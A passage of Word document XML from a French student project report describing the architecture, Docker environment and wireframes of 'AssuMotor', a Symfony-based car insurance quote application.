        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="7ED85D6D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0BA19C7B" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>Base de données</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2708" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="51FCD414" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3613" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6B60E259" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C">
            <w:r>
              <w:t>8.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="45FF3058" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4D850A6B" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>Outil de maquettage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2708" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="03ED9366" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Balsamiq</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Wireframes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3613" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4C3C7271" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C">
            <w:r>
              <w:t>–</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="4049FC71" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="69EE6AE5" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>Outil de tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2708" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7A87C59B" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>Aucun (tests manuels uniquement)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3613" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="45B4B329" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C">
            <w:r>
              <w:t>–</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52C2B995" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13566944" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc233817741"/>
      <w:r>
        <w:t>4.2 Architecture générale du projet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="75110AE6" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00E83FF4">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc233817742"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Une architecture MVC monolithique avec Symfony</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="6CC44BF3" w14:textId="77777777" w:rsidR="0097702C" w:rsidRPr="0097702C" w:rsidRDefault="0097702C" w:rsidP="00C1520D">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0097702C">
        <w:t>AssuMotor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0097702C">
        <w:t xml:space="preserve"> repose sur une architecture MVC (Modèle-Vue-Contrôleur) fournie par Symfony, qui organise le code en trois couches au rôle bien délimité.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A29CBE" w14:textId="1FC82161" w:rsidR="0097702C" w:rsidRPr="0097702C" w:rsidRDefault="0097702C" w:rsidP="00C1520D">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000945E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Le Modèle</w:t>
      </w:r>
      <w:r w:rsidRPr="0097702C">
        <w:t xml:space="preserve"> rassemble neuf entités Doctrine </w:t>
      </w:r>
      <w:r w:rsidR="000945E8">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0097702C">
        <w:t xml:space="preserve">User, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0097702C">
        <w:t>Quote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0097702C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0097702C">
        <w:t>Vehicle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidR="000945E8">
        <w:t>),</w:t>
      </w:r>
      <w:r w:rsidRPr="0097702C">
        <w:t xml:space="preserve"> chacune mappée sur une table MySQL. Les opérations de lecture complexes (jointures, tri, filtrage) sont déléguées à des classes Repository dédiées, ce qui maintient les entités focalisées sur la structure des données.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1663FB6B" w14:textId="77777777" w:rsidR="0097702C" w:rsidRPr="0097702C" w:rsidRDefault="0097702C" w:rsidP="00C1520D">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000945E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Les Vues</w:t>
      </w:r>
      <w:r w:rsidRPr="0097702C">
        <w:t xml:space="preserve"> sont des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0097702C">
        <w:t>templates</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0097702C">
        <w:t xml:space="preserve"> Twig qui héritent tous de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0097702C">
        <w:t>base.html.twig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0097702C">
        <w:t xml:space="preserve">. Ce gabarit de base intègre Bootstrap 5, expose les blocs </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0097702C">
        <w:t>title</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0097702C">
        <w:t xml:space="preserve"> et body, et inclut les partiels communs (_header, _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0097702C">
        <w:t>nav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0097702C">
        <w:t>, _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0097702C">
        <w:t>footer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0097702C">
        <w:t>). Chaque page surcharge uniquement les blocs qui lui sont propres, évitant toute duplication de la structure HTML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA13B8C" w14:textId="17F1C192" w:rsidR="003A6B7F" w:rsidRDefault="0097702C" w:rsidP="00C1520D">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000945E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Les Contrôleur</w:t>
      </w:r>
      <w:r w:rsidRPr="0097702C">
        <w:t xml:space="preserve">s orchestrent les échanges entre le modèle et la vue. Par exemple, lorsqu'un client soumet un devis, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0097702C">
        <w:t>QuoteController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0097702C">
        <w:t xml:space="preserve"> reçoit la requête, délègue le calcul du prix à </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0097702C">
        <w:t>QuoteCalculator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0097702C">
        <w:t xml:space="preserve">, persiste le devis via Doctrine, puis redirige vers la page de récapitulatif en passant les données au </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0097702C">
        <w:t>template</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0097702C">
        <w:t xml:space="preserve"> Twig. La logique métier (calcul tarifaire, gestion des statuts, génération PDF) est systématiquement </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0097702C">
        <w:t>extraite</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0097702C">
        <w:t xml:space="preserve"> dans des services Symfony injectés par le conteneur d'injection de dépendances, ce qui allège les contrôleurs et facilite les tests </w:t>
      </w:r>
      <w:r w:rsidR="000945E8" w:rsidRPr="0097702C">
        <w:t>unitaires</w:t>
      </w:r>
      <w:r w:rsidR="000945E8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73766E08" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00E83FF4">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc233817743"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Pourquoi ce choix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="216812A2" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00E83FF4">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cette architecture correspond aux compétences attendues par le référentiel DWWM (Bloc 2 : développement </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>back-end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>). Symfony impose une structure claire et une séparation des responsabilités par convention, ce qui facilite la maintenance du code et la montée en compétences. Le choix d'une architecture monolithique est adapté à la taille du projet et au développement en solo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309F8FB8" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F" w:rsidP="00E83FF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74594887" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20405636" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="5F381022" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc233817744"/>
      <w:r>
        <w:t>5. RÉALISATIONS FRONT-END</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="364D4A71" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc233817745"/>
      <w:r>
        <w:t>5.1 Installation et configuration de l'environnement de travail</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="4E2D9C21" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00E83FF4">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc233817746"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Mise en place avec Docker Compose</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="46CB77FA" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00E83FF4">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>L'environnement démarre avec la commande docker-compose up -d --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>build</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, qui construit et lance quatre services : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (PHP 8.2-fpm-alpine avec les extensions nécessaires), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (serveur web), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (base de données MySQL 8.0) et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>phpmyadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (interface d'administration). Chaque service est isolé dans son propre conteneur et communicant via un réseau Docker interne.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C6916F" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="0AC5FA1D" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00B24687">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc233817747"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Un outil d'administration pour faciliter le développement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="1B691D84" w14:textId="34472888" w:rsidR="003A6B7F" w:rsidRDefault="00E83FF4" w:rsidP="00B24687">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>PhpMyAdmin</w:t>
      </w:r>
      <w:r w:rsidR="003239D4">
        <w:t xml:space="preserve"> est intégré à l'environnement Docker afin de visualiser et manipuler les données directement depuis le navigateur (accessible sur localhost:808</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="003239D4">
        <w:t>). Il permet d'inspecter le schéma de la base, de vérifier les données insérées par les fixtures et de diagnostiquer d'éventuels problèmes lors du développement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9E1A16" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00B24687">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc233817748"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Éditeur et configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="0E5B7C43" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00B24687">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le développement a été réalisé avec Visual Studio Code, équipé de l'extension PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Intelephense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pour l'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>autocomplétion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et la navigation dans le code Symfony. La configuration du projet (paramètres Docker, variables d'environnement) est gérée via les fichiers .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>env</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et docker-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>compose.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> à la racine du projet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BAC7A4" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="2689CC5A" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="00B24687">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc233817749"/>
      <w:r>
        <w:t>5.2 Maquettage des interfaces utilisateur</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="091C5ECE" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="00363BC2" w:rsidRDefault="003239D4" w:rsidP="004C2E3C">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc233817750"/>
      <w:r w:rsidRPr="00363BC2">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t>5.2.1 Outil de maquettage utilisé</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="2DF6B335" w14:textId="12432956" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00B24687">
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>L'outil Balsamiq Wireframes a été retenu pour créer les maquettes du projet. Ce choix s'explique par sa prise en main rapide et son rendu volontairement « fil de fer », qui permet de se concentrer sur la structure et la navigation sans se disperser sur les détails visuels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C45C92D" w14:textId="1BF25E9B" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="004C2E3C">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Des zonings ont d'abord été réalisés pour définir la disposition générale des blocs sur chaque page (header, contenu principal, pied de page). Ces zonings ont ensuite servi de base pour les wireframes détaillés présentés dans les sections suivantes.</w:t>
      </w:r>
      <w:r w:rsidR="003A6CB7">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F51551B" w14:textId="77777777" w:rsidR="003A6CB7" w:rsidRDefault="003A6CB7" w:rsidP="004C2E3C">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F9CB26F" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="5FD72D8D" w14:textId="5A13F768" w:rsidR="00DD73A8" w:rsidRPr="00540A83" w:rsidRDefault="003239D4" w:rsidP="00540A83">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc233817752"/>
      <w:r w:rsidRPr="00363BC2">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t>5.2.</w:t>
      </w:r>
      <w:r w:rsidR="00DD73A8" w:rsidRPr="00363BC2">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00363BC2">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidR="00540A83" w:rsidRPr="00540A83">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t>Schéma d'enchaînement des maquettes</w:t>
      </w:r>
      <w:r w:rsidR="00540A83">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD73A8" w:rsidRPr="00363BC2">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t>(mobile, tablette, desktop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25045554" w14:textId="77777777" w:rsidR="00460BA8" w:rsidRDefault="00460BA8" w:rsidP="00460BA8">
      <w:pPr>
        <w:pStyle w:val="StrongEmphasis"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05125554" w14:textId="32DB24A0" w:rsidR="003A6CB7" w:rsidRPr="00460BA8" w:rsidRDefault="00DD73A8" w:rsidP="00460BA8">
      <w:pPr>
        <w:pStyle w:val="StrongEmphasis"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00460BA8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>■ Version Mobile</w:t>
      </w:r>
      <w:r w:rsidR="00460BA8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D31D2BF" w14:textId="0DC7D740" w:rsidR="008E4633" w:rsidRPr="008E4633" w:rsidRDefault="00A31158" w:rsidP="008E4633">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4699699F" wp14:editId="272DF0CE">
            <wp:extent cx="1859915" cy="4991701"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="55207206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2067" name="Image 552072067"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1878070" cy="5040425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00FD20B2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3416F09B" wp14:editId="59B31D81">
            <wp:extent cx="1889460" cy="4994778"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
